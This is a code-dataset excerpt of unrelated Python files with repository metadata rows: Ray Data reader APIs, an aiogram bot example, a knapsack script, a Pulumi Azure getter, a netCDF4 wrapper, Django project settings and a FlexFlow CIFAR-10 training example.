return task()
if ray_remote_args is None:
ray_remote_args = {}
# Increase the read parallelism by default to maximize IO throughput. This
# is particularly important when reading from e.g., remote storage.
if "num_cpus" not in ray_remote_args:
# Note that the too many workers warning triggers at 4x subscription,
# so we go at 0.5 to avoid the warning message.
ray_remote_args["num_cpus"] = 0.5
remote_read = cached_remote_fn(remote_read)
if _spread_resource_prefix is not None:
# Use given spread resource prefix for round-robin resource-based
# scheduling.
nodes = ray.nodes()
resource_iter = _get_spread_resources_iter(
nodes, _spread_resource_prefix, ray_remote_args)
else:
# If no spread resource prefix given, yield an empty dictionary.
resource_iter = itertools.repeat({})
calls: List[Callable[[], ObjectRef[Block]]] = []
metadata: List[BlockMetadata] = []
for task in read_tasks:
calls.append(
lambda task=task,
resources=next(resource_iter): remote_read.options(
**ray_remote_args,
resources=resources).remote(task))
metadata.append(task.get_metadata())
block_list = LazyBlockList(calls, metadata)
# Get the schema from the first block synchronously.
if metadata and metadata[0].schema is None:
get_schema = cached_remote_fn(_get_schema)
schema0 = ray.get(get_schema.remote(next(iter(block_list))))
block_list.set_metadata(
0,
BlockMetadata(
num_rows=metadata[0].num_rows,
size_bytes=metadata[0].size_bytes,
schema=schema0,
input_files=metadata[0].input_files,
))
return Dataset(block_list)
@PublicAPI(stability="beta")
def read_parquet(paths: Union[str, List[str]],
*,
filesystem: Optional["pyarrow.fs.FileSystem"] = None,
columns: Optional[List[str]] = None,
parallelism: int = 200,
ray_remote_args: Dict[str, Any] = None,
_tensor_column_schema: Optional[Dict[str, Tuple[
np.dtype, Tuple[int, ...]]]] = None,
**arrow_parquet_args) -> Dataset[ArrowRow]:
"""Create an Arrow dataset from parquet files.
Examples:
>>> # Read a directory of files in remote storage.
>>> ray.data.read_parquet("s3://bucket/path")
>>> # Read multiple local files.
>>> ray.data.read_parquet(["/path/to/file1", "/path/to/file2"])
Args:
paths: A single file path or a list of file paths (or directories).
filesystem: The filesystem implementation to read from.
columns: A list of column names to read.
parallelism: The amount of parallelism to use for the dataset.
ray_remote_args: kwargs passed to ray.remote in the read tasks.
_tensor_column_schema: A dict of column name --> tensor dtype and shape
mappings for converting a Parquet column containing serialized
tensors (ndarrays) as their elements to our tensor column extension
type. This assumes that the tensors were serialized in the raw
NumPy array format in C-contiguous order (e.g. via
`arr.tobytes()`).
arrow_parquet_args: Other parquet read options to pass to pyarrow.
Returns:
Dataset holding Arrow records read from the specified paths.
"""
if _tensor_column_schema is not None:
existing_block_udf = arrow_parquet_args.pop("_block_udf", None)
def _block_udf(block: "pyarrow.Table") -> "pyarrow.Table":
from ray.data.extensions import ArrowTensorArray
for tensor_col_name, (dtype,
shape) in _tensor_column_schema.items():
# NOTE(Clark): We use NumPy to consolidate these potentially
# non-contiguous buffers, and to do buffer bookkeeping in
# general.
np_col = np.array([
np.ndarray(shape, buffer=buf.as_buffer(), dtype=dtype)
for buf in block.column(tensor_col_name)
])
block = block.set_column(
block._ensure_integer_index(tensor_col_name),
tensor_col_name, ArrowTensorArray.from_numpy(np_col))
if existing_block_udf is not None:
# Apply UDF after casting the tensor columns.
block = existing_block_udf(block)
return block
arrow_parquet_args["_block_udf"] = _block_udf
return read_datasource(
ParquetDatasource(),
parallelism=parallelism,
paths=paths,
filesystem=filesystem,
columns=columns,
ray_remote_args=ray_remote_args,
**arrow_parquet_args)
@PublicAPI(stability="beta")
def read_json(paths: Union[str, List[str]],
*,
filesystem: Optional["pyarrow.fs.FileSystem"] = None,
parallelism: int = 200,
ray_remote_args: Dict[str, Any] = None,
**arrow_json_args) -> Dataset[ArrowRow]:
"""Create an Arrow dataset from json files.
Examples:
>>> # Read a directory of files in remote storage.
>>> ray.data.read_json("s3://bucket/path")
>>> # Read multiple local files.
>>> ray.data.read_json(["/path/to/file1", "/path/to/file2"])
>>> # Read multiple directories.
>>> ray.data.read_json(["s3://bucket/path1", "s3://bucket/path2"])
Args:
paths: A single file/directory path or a list of file/directory paths.
A list of paths can contain both files and directories.
filesystem: The filesystem implementation to read from.
parallelism: The amount of parallelism to use for the dataset.
ray_remote_args: kwargs passed to ray.remote in the read tasks.
arrow_json_args: Other json read options to pass to pyarrow.
Returns:
Dataset holding Arrow records read from the specified paths.
"""
return read_datasource(
JSONDatasource(),
parallelism=parallelism,
paths=paths,
filesystem=filesystem,
ray_remote_args=ray_remote_args,
**arrow_json_args)
@PublicAPI(stability="beta")
def read_csv(paths: Union[str, List[str]],
*,
filesystem: Optional["pyarrow.fs.FileSystem"] = None,
parallelism: int = 200,
ray_remote_args: Dict[str, Any] = None,
**arrow_csv_args) -> Dataset[ArrowRow]:
"""Create an Arrow dataset from csv files.
Examples:
>>> # Read a directory of files in remote storage.
>>> ray.data.read_csv("s3://bucket/path")
>>> # Read multiple local files.
>>> ray.data.read_csv(["/path/to/file1", "/path/to/file2"])
>>> # Read multiple directories.
>>> ray.data.read_csv(["s3://bucket/path1", "s3://bucket/path2"])
Args:
paths: A single file/directory path or a list of file/directory paths.
A list of paths can contain both files and directories.
filesystem: The filesystem implementation to read from.
parallelism: The amount of parallelism to use for the dataset.
ray_remote_args: kwargs passed to ray.remote in the read tasks.
arrow_csv_args: Other csv read options to pass to pyarrow.
Returns:
Dataset holding Arrow records read from the specified paths.
"""
return read_datasource(
CSVDatasource(),
parallelism=parallelism,
paths=paths,
filesystem=filesystem,
ray_remote_args=ray_remote_args,
**arrow_csv_args)
@PublicAPI(stability="beta")
def read_text(
paths: Union[str, List[str]],
*,
encoding: str = "utf-8",
filesystem: Optional["pyarrow.fs.FileSystem"] = None,
parallelism: int = 200,
) -> Dataset[str]:
"""Create a dataset from lines stored in text files.
Examples:
>>> # Read a directory of files in remote storage.
>>> ray.data.read_text("s3://bucket/path")
>>> # Read multiple local files.
>>> ray.data.read_text(["/path/to/file1", "/path/to/file2"])
Args:
paths: A single file path or a list of file paths (or directories).
encoding: The encoding of the files (e.g., "utf-8" or "ascii").
filesystem: The filesystem implementation to read from.
parallelism: The amount of parallelism to use for the dataset.
Returns:
Dataset holding lines of text read from the specified paths.
"""
return read_binary_files(
paths, filesystem=filesystem, parallelism=parallelism).flat_map(
lambda x: x.decode(encoding).split("\n"))
@PublicAPI(stability="beta")
def read_numpy(paths: Union[str, List[str]],
*,
filesystem: Optional["pyarrow.fs.FileSystem"] = None,
parallelism: int = 200,
**numpy_load_args) -> Dataset[ArrowRow]:
"""Create an Arrow dataset from csv files.
Examples:
>>> # Read a directory of files in remote storage.
>>> ray.data.read_numpy("s3://bucket/path")
>>> # Read multiple local files.
>>> ray.data.read_numpy(["/path/to/file1", "/path/to/file2"])
>>> # Read multiple directories.
>>> ray.data.read_numpy(["s3://bucket/path1", "s3://bucket/path2"])
Args:
paths: A single file/directory path or a list of file/directory paths.
A list of paths can contain both files and directories.
filesystem: The filesystem implementation to read from.
parallelism: The amount of parallelism to use for the dataset.
numpy_load_args: Other options to pass to np.load.
Returns:
Dataset holding Tensor records read from the specified paths.
"""
return read_datasource(
NumpyDatasource(),
parallelism=parallelism,
paths=paths,
filesystem=filesystem,
**numpy_load_args)
@PublicAPI(stability="beta")
def read_binary_files(
paths: Union[str, List[str]],
*,
include_paths: bool = False,
filesystem: Optional["pyarrow.fs.FileSystem"] = None,
parallelism: int = 200,
ray_remote_args: Dict[str, Any] = None,
) -> Dataset[Union[Tuple[str, bytes], bytes]]:
"""Create a dataset from binary files of arbitrary contents.
Examples:
>>> # Read a directory of files in remote storage.
>>> ray.data.read_binary_files("s3://bucket/path")
>>> # Read multiple local files.
>>> ray.data.read_binary_files(["/path/to/file1", "/path/to/file2"])
Args:
paths: A single file path or a list of file paths (or directories).
include_paths: Whether to include the full path of the file in the
dataset records. When specified, the dataset records will be a
tuple of the file path and the file contents.
filesystem: The filesystem implementation to read from.
ray_remote_args: kwargs passed to ray.remote in the read tasks.
parallelism: The amount of parallelism to use for the dataset.
Returns:
Dataset holding Arrow records read from the specified paths.
"""
return read_datasource(
BinaryDatasource(),
parallelism=parallelism,
paths=paths,
include_paths=include_paths,
filesystem=filesystem,
ray_remote_args=ray_remote_args,
schema=bytes)
@PublicAPI(stability="beta")
def from_dask(df: "dask.DataFrame") -> Dataset[ArrowRow]:
"""Create a dataset from a Dask DataFrame.
Args:
df: A Dask DataFrame.
Returns:
Dataset holding Arrow records read from the DataFrame.
"""
import dask
from ray.util.dask import ray_dask_get
partitions = df.to_delayed()
persisted_partitions = dask.persist(*partitions, scheduler=ray_dask_get)
return from_pandas(
[next(iter(part.dask.values())) for part in persisted_partitions])
@PublicAPI(stability="beta")
def from_mars(df: "mars.DataFrame", *,
parallelism: int = 200) -> Dataset[ArrowRow]:
"""Create a dataset from a MARS dataframe.
Args:
df: A MARS dataframe, which must be executed by MARS-on-Ray.
Returns:
Dataset holding Arrow records read from the dataframe.
"""
raise NotImplementedError # P1
@PublicAPI(stability="beta")
def from_modin(df: "modin.DataFrame") -> Dataset[ArrowRow]:
"""Create a dataset from a Modin dataframe.
Args:
df: A Modin dataframe, which must be using the Ray backend.
Returns:
Dataset holding Arrow records read from the dataframe.
"""
from modin.distributed.dataframe.pandas.partitions import unwrap_partitions
parts = unwrap_partitions(df, axis=0)
return from_pandas_refs(parts)
@PublicAPI(stability="beta")
def from_pandas(dfs: List["pandas.DataFrame"]) -> Dataset[ArrowRow]:
"""Create a dataset from a list of Pandas dataframes.
Args:
dfs: A list of Pandas dataframes.
Returns:
Dataset holding Arrow records read from the dataframes.
"""
return from_pandas_refs([ray.put(df) for df in dfs])
@DeveloperAPI
def from_pandas_refs(
dfs: List[ObjectRef["pandas.DataFrame"]]) -> Dataset[ArrowRow]:
"""Create a dataset from a list of Ray object references to Pandas
dataframes.
Args:
dfs: A list of Ray object references to pandas dataframes.
Returns:
Dataset holding Arrow records read from the dataframes.
"""
df_to_block = cached_remote_fn(_df_to_block, num_returns=2)
res = [df_to_block.remote(df) for df in dfs]
blocks, metadata = zip(*res)
return Dataset(BlockList(blocks, ray.get(list(metadata))))
def from_numpy(ndarrays: List[ObjectRef[np.ndarray]]) -> Dataset[ArrowRow]:
"""Create a dataset from a set of NumPy ndarrays.
Args:
ndarrays: A list of Ray object references to NumPy ndarrays.
Returns:
Dataset holding the given ndarrays.
"""
ndarray_to_block = cached_remote_fn(_ndarray_to_block, num_returns=2)
res = [ndarray_to_block.remote(ndarray) for ndarray in ndarrays]
blocks, metadata = zip(*res)
return Dataset(BlockList(blocks, ray.get(list(metadata))))
@PublicAPI(stability="beta")
def from_arrow(
tables: List[Union["pyarrow.Table", bytes]]) -> Dataset[ArrowRow]:
"""Create a dataset from a list of Arrow tables.
Args:
tables: A list of Ray object references to Arrow tables,
or its streaming format in bytes.
Returns:
Dataset holding Arrow records from the tables.
"""
return from_arrow_refs([ray.put(t) for t in tables])
@DeveloperAPI
def from_arrow_refs(tables: List[ObjectRef[Union["pyarrow.Table", bytes]]]
) -> Dataset[ArrowRow]:
"""Create a dataset from a set of Arrow tables.
Args:
tables: A list of Ray object references to Arrow tables,
or its streaming format in bytes.
Returns:
Dataset holding Arrow records from the tables.
"""
get_metadata = cached_remote_fn(_get_metadata)
metadata = [get_metadata.remote(t) for t in tables]
return Dataset(BlockList(tables, ray.get(metadata)))
@PublicAPI(stability="beta")
def from_spark(df: "pyspark.sql.DataFrame",
*,
parallelism: Optional[int] = None) -> Dataset[ArrowRow]:
"""Create a dataset from a Spark dataframe.
Args:
spark: A SparkSession, which must be created by RayDP (Spark-on-Ray).
df: A Spark dataframe, which must be created by RayDP (Spark-on-Ray).
parallelism: The amount of parallelism to use for the dataset.
If not provided, it will be equal to the number of partitions of
the original Spark dataframe.
Returns:
Dataset holding Arrow records read from the dataframe.
"""
import raydp
return raydp.spark.spark_dataframe_to_ray_dataset(df, parallelism)
def _df_to_block(df: "pandas.DataFrame") -> Block[ArrowRow]:
import pyarrow as pa
block = pa.table(df)
return (block,
BlockAccessor.for_block(block).get_metadata(input_files=None))
def _ndarray_to_block(ndarray: np.ndarray) -> Block[np.ndarray]:
import pyarrow as pa
from ray.data.extensions import TensorArray
table = pa.Table.from_pydict({"value": TensorArray(ndarray)})
return (table,
BlockAccessor.for_block(table).get_metadata(input_files=None))
def _get_schema(block: Block) -> Any:
return BlockAccessor.for_block(block).schema()
def _get_metadata(table: "pyarrow.Table") -> BlockMetadata:
return BlockAccessor.for_block(table).get_metadata(input_files=None)
| 34.448113 | 79 | 0.644667 |
3d488364715b3cceb8377fa88b63fd3258c1b241 | 1,170 | py | Python | examples/media_group.py | andrew-ld/aiogram | b55153ccf3ab9ef191bef6c20e467b92f3b270ed | [
"MIT"
] | 2,744 | 2017-11-19T00:56:19.000Z | 2022-03-31T15:48:23.000Z | examples/media_group.py | andrew-ld/aiogram | b55153ccf3ab9ef191bef6c20e467b92f3b270ed | [
"MIT"
] | 513 | 2018-01-23T16:52:59.000Z | 2022-03-27T01:50:30.000Z | examples/media_group.py | andrew-ld/aiogram | b55153ccf3ab9ef191bef6c20e467b92f3b270ed | [
"MIT"
] | 813 | 2017-12-05T06:49:48.000Z | 2022-03-29T15:47:50.000Z | import asyncio
from aiogram import Bot, Dispatcher, executor, filters, types
API_TOKEN = 'BOT_TOKEN_HERE'
bot = Bot(token=API_TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(filters.CommandStart())
async def send_welcome(message: types.Message):
# So... At first I want to send something like this:
await message.reply("Do you want to see many pussies? Are you ready?")
# Wait a little...
await asyncio.sleep(1)
# Good bots should send chat actions...
await types.ChatActions.upload_photo()
# Create media group
media = types.MediaGroup()
# Attach local file
media.attach_photo(types.InputFile('data/cat.jpg'), 'Cat!')
# More local files and more cats!
media.attach_photo(types.InputFile('data/cats.jpg'), 'More cats!')
# You can also use URL's
# For example: get random puss:
media.attach_photo('http://lorempixel.com/400/200/cats/', 'Random cat.')
# And you can also use file ID:
# media.attach_photo('<file_id>', 'cat-cat-cat.')
# Done! Send media group
await message.reply_media_group(media=media)
if __name__ == '__main__':
executor.start_polling(dp, skip_updates=True)
| 26.590909 | 76 | 0.691453 |
604bcaa13f3d936d9e39424083f39d77064dbfec | 887 | py | Python | dynamicProgramming/knapsack/knapsack.py | G-MontaG/leetcode | 444e8ee3f395c191a86eae0e42d028060ecd1686 | [
"MIT"
] | 1 | 2021-02-10T18:14:55.000Z | 2021-02-10T18:14:55.000Z | dynamicProgramming/knapsack/knapsack.py | G-MontaG/leetcode | 444e8ee3f395c191a86eae0e42d028060ecd1686 | [
"MIT"
] | null | null | null | dynamicProgramming/knapsack/knapsack.py | G-MontaG/leetcode | 444e8ee3f395c191a86eae0e42d028060ecd1686 | [
"MIT"
] | null | null | null | # | Item | Weight | Value |
# |------|--------|-------|
# | 1 | 2 | 1 |
# | 2 | 10 | 20 |
# | 3 | 3 | 3 |
# | 4 | 6 | 14 |
# | 5 | 18 | 100 |
# Put a placeholder 0 weight, 0 value item to max
# these line up better with the 1D memoization table K
item_weights = [0, 2, 10, 3, 6, 18]
item_values = [0, 1, 20, 3, 14, 100]
n = len(item_weights)
W = 15 # total weight capacity
K = [[0 for w in range(W + 1)] for i in range(n)]
# Recurrence
for i in range(1, n):
for w in range(1, W + 1):
wi = item_weights[i]
vi = item_values[i]
if wi <= w:
K[i][w] = max([K[i - 1][w - wi] + vi, K[i - 1][w]])
else:
K[i][w] = K[i - 1][w]
# Results
print("Result: ", K[n - 1][W])
# Optional: Uncomment to view the 2D table
# from pandas import *
# print("K table:")
# print(DataFrame(K))
| 24.638889 | 63 | 0.472379 |
24059c699a1309924ad46a76693e23c5834c66b6 | 35 | py | Python | __init__.py | Robaina/filterSAM | e1a545296eb7826f7f61cef483bf228477d27ebe | [
"CC-BY-4.0"
] | 2 | 2021-12-02T22:11:16.000Z | 2022-01-24T14:04:02.000Z | __init__.py | Robaina/filterSAM | e1a545296eb7826f7f61cef483bf228477d27ebe | [
"CC-BY-4.0"
] | null | null | null | __init__.py | Robaina/filterSAM | e1a545296eb7826f7f61cef483bf228477d27ebe | [
"CC-BY-4.0"
] | null | null | null | from .filtersam.filtersam import *
| 17.5 | 34 | 0.8 |
b876136cee9df3622810faa47665a2c25c920a3a | 6,344 | py | Python | sdk/python/pulumi_azure_nextgen/cognitiveservices/v20160201preview/get_cognitive_services_account.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/cognitiveservices/v20160201preview/get_cognitive_services_account.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/cognitiveservices/v20160201preview/get_cognitive_services_account.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetCognitiveServicesAccountResult',
'AwaitableGetCognitiveServicesAccountResult',
'get_cognitive_services_account',
]
@pulumi.output_type
class GetCognitiveServicesAccountResult:
"""
Cognitive Services Account is an Azure resource representing the provisioned account, its type, location and SKU.
"""
def __init__(__self__, endpoint=None, etag=None, kind=None, location=None, name=None, provisioning_state=None, sku=None, tags=None, type=None):
if endpoint and not isinstance(endpoint, str):
raise TypeError("Expected argument 'endpoint' to be a str")
pulumi.set(__self__, "endpoint", endpoint)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if sku and not isinstance(sku, dict):
raise TypeError("Expected argument 'sku' to be a dict")
pulumi.set(__self__, "sku", sku)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def endpoint(self) -> Optional[str]:
"""
Endpoint of the created account
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter
def etag(self) -> Optional[str]:
"""
Entity Tag
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Type of cognitive service account.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
The location of the resource
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
The name of the created account
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
Gets the status of the cognitive services account at the time the operation was called.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def sku(self) -> Optional['outputs.SkuResponse']:
"""
The SKU of the cognitive services account.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Gets or sets a list of key value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
class AwaitableGetCognitiveServicesAccountResult(GetCognitiveServicesAccountResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetCognitiveServicesAccountResult(
endpoint=self.endpoint,
etag=self.etag,
kind=self.kind,
location=self.location,
name=self.name,
provisioning_state=self.provisioning_state,
sku=self.sku,
tags=self.tags,
type=self.type)
def get_cognitive_services_account(account_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetCognitiveServicesAccountResult:
"""
Use this data source to access information about an existing resource.
:param str account_name: The name of the cognitive services account within the specified resource group. Cognitive Services account names must be between 3 and 24 characters in length and use numbers and lower-case letters only.
:param str resource_group_name: The name of the resource group within the user's subscription.
"""
__args__ = dict()
__args__['accountName'] = account_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:cognitiveservices/v20160201preview:getCognitiveServicesAccount', __args__, opts=opts, typ=GetCognitiveServicesAccountResult).value
return AwaitableGetCognitiveServicesAccountResult(
endpoint=__ret__.endpoint,
etag=__ret__.etag,
kind=__ret__.kind,
location=__ret__.location,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
sku=__ret__.sku,
tags=__ret__.tags,
type=__ret__.type)
| 37.317647 | 312 | 0.64959 |
2259f597dffc0f6c955c10db971d41fb48ee5bd4 | 1,503 | py | Python | kid_readout/measurement/io/easync.py | danielflanigan/kid_readout | 07202090d468669200cab78297122880c1c03e87 | [
"BSD-2-Clause"
] | 1 | 2015-05-21T20:57:39.000Z | 2015-05-21T20:57:39.000Z | kid_readout/utils/easync.py | braddober/kid_readout | 1917960c761663227fa5b74fff34e38a03b80b4d | [
"BSD-2-Clause"
] | null | null | null | kid_readout/utils/easync.py | braddober/kid_readout | 1917960c761663227fa5b74fff34e38a03b80b4d | [
"BSD-2-Clause"
] | null | null | null | """
easync.py - easier access to netCDF4 files
"""
import netCDF4
class EasyGroup(object):
def __repr__(self):
return "EasyNC: %s %s" % (self._filename,self.group.path)
def __str__(self):
return self.__repr__()
def __init__(self,group,filename):
self._filename = filename
self.group = group
self.groups = group.groups
self.variables = group.variables
self.dimensions = group.dimensions
for gname in group.groups.keys():
if hasattr(self,gname):
print self,"already has an attribute",gname,"skipping"
continue
self.__setattr__(gname,EasyGroup(group.groups[gname],self._filename))
for vname in group.variables.keys():
if hasattr(self,vname):
print self,"already has an attribute",vname,"skipping"
continue
self.__setattr__(vname,group.variables[vname])
for dname in group.dimensions.keys():
dimname = "dim_" + dname
if hasattr(self,dimname):
print self,"already has an attribute",dimname,"skipping"
continue
self.__setattr__(dimname,group.dimensions[dname])
def EasyNetCDF4(*args,**kwargs):
nc = netCDF4.Dataset(*args,**kwargs)
if len(args) > 0:
fn = args[0]
else:
fn = kwargs['filename']
enc = EasyGroup(nc,fn)
enc.close = nc.close
enc.sync = nc.sync
return enc | 34.159091 | 81 | 0.586826 |
013311bc9ab25f701b48f2903b1d44a7fceb261a | 4,489 | py | Python | platzigram/settings.py | chegrofelix/insta-clone | b0adb0050f8c9d5f9e40e152b65d9d68b60a3d74 | [
"MIT"
] | 1 | 2021-04-02T13:59:20.000Z | 2021-04-02T13:59:20.000Z | platzigram/settings.py | chegrofelix/insta-clone | b0adb0050f8c9d5f9e40e152b65d9d68b60a3d74 | [
"MIT"
] | null | null | null | platzigram/settings.py | chegrofelix/insta-clone | b0adb0050f8c9d5f9e40e152b65d9d68b60a3d74 | [
"MIT"
] | null | null | null | """
Django settings for platzigram project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
import django_heroku
from pathlib import Path
from decouple import config,Csv
import cloudinary
import cloudinary.uploader
import cloudinary.api
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', default=False, cast=bool)
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
#Django Apps
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#Local Apps
'posts',
'users',
'cloudinary'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'platzigram.middleware.ProfileCompletionMiddleware',
]
ROOT_URLCONF = 'platzigram.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
# Esto lo agregue
os.path.join(BASE_DIR, 'templates')
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'platzigram.wsgi.application'
cloudinary.config(
cloud_name = config('cloud_name'),
api_key = config('api_key'),
api_secret = config('api_secret')
)
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
#development
if config('MODE')=="dev":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD'),
}
}
# production
else:
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (os.path.join(BASE_DIR, 'static'), )
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
# Media para desarrollo
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# Login
LOGIN_URL = '/users/login/'
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = '/users/login/'
# Configure Django App for Heroku.
django_heroku.settings(locals())
| 25.219101 | 91 | 0.692136 |
85a915ac57e82e13bc28c2b056ee878dc638aea0 | 2,167 | py | Python | examples/python/pytorch/cifar10_cnn.py | sdalton1/FlexFlow | a08386df098aaa23195ba15af2d0e1c88ecc399c | [
"Apache-2.0"
] | null | null | null | examples/python/pytorch/cifar10_cnn.py | sdalton1/FlexFlow | a08386df098aaa23195ba15af2d0e1c88ecc399c | [
"Apache-2.0"
] | null | null | null | examples/python/pytorch/cifar10_cnn.py | sdalton1/FlexFlow | a08386df098aaa23195ba15af2d0e1c88ecc399c | [
"Apache-2.0"
] | null | null | null | from flexflow.core import *
from flexflow.keras.datasets import cifar10
from flexflow.torch.model import PyTorchModel
#from accuracy import ModelAccuracy
def top_level_task():
ffconfig = FFConfig()
print("Python API batchSize(%d) workersPerNodes(%d) numNodes(%d)" %(ffconfig.batch_size, ffconfig.workers_per_node, ffconfig.num_nodes))
ffmodel = FFModel(ffconfig)
dims_input = [ffconfig.batch_size, 3, 32, 32]
input_tensor = ffmodel.create_tensor(dims_input, DataType.DT_FLOAT)
torch_model = PyTorchModel("cnn.ff")
output_tensors = torch_model.apply(ffmodel, [input_tensor, input_tensor])
t = ffmodel.softmax(output_tensors[0])
ffoptimizer = SGDOptimizer(ffmodel, 0.01)
ffmodel.optimizer = ffoptimizer
ffmodel.compile(loss_type=LossType.LOSS_SPARSE_CATEGORICAL_CROSSENTROPY, metrics=[MetricsType.METRICS_ACCURACY, MetricsType.METRICS_SPARSE_CATEGORICAL_CROSSENTROPY])
label_tensor = ffmodel.label_tensor
num_samples = 10000
(x_train, y_train), (x_test, y_test) = cifar10.load_data(num_samples)
x_train = x_train.astype('float32')
x_train /= 255
full_input_array = x_train
y_train = y_train.astype('int32')
full_label_array = y_train
dataloader_input = ffmodel.create_data_loader(input_tensor, full_input_array)
dataloader_label = ffmodel.create_data_loader(label_tensor, full_label_array)
num_samples = dataloader_input.get_num_samples()
ffmodel.init_layers()
layers = ffmodel.get_layers()
for layer in layers:
print(layers[layer].name)
layer = ffmodel.get_layer_by_name("relu_1")
print(layer)
epochs = ffconfig.epochs
ts_start = ffconfig.get_current_time()
ffmodel.fit(x=dataloader_input, y=dataloader_label, epochs=epochs)
ts_end = ffconfig.get_current_time()
run_time = 1e-6 * (ts_end - ts_start);
print("epochs %d, ELAPSED TIME = %.4fs, THROUGHPUT = %.2f samples/s\n" %(epochs, run_time, num_samples * epochs / run_time));
# perf_metrics = ffmodel.get_perf_metrics()
# accuracy = perf_metrics.get_accuracy()
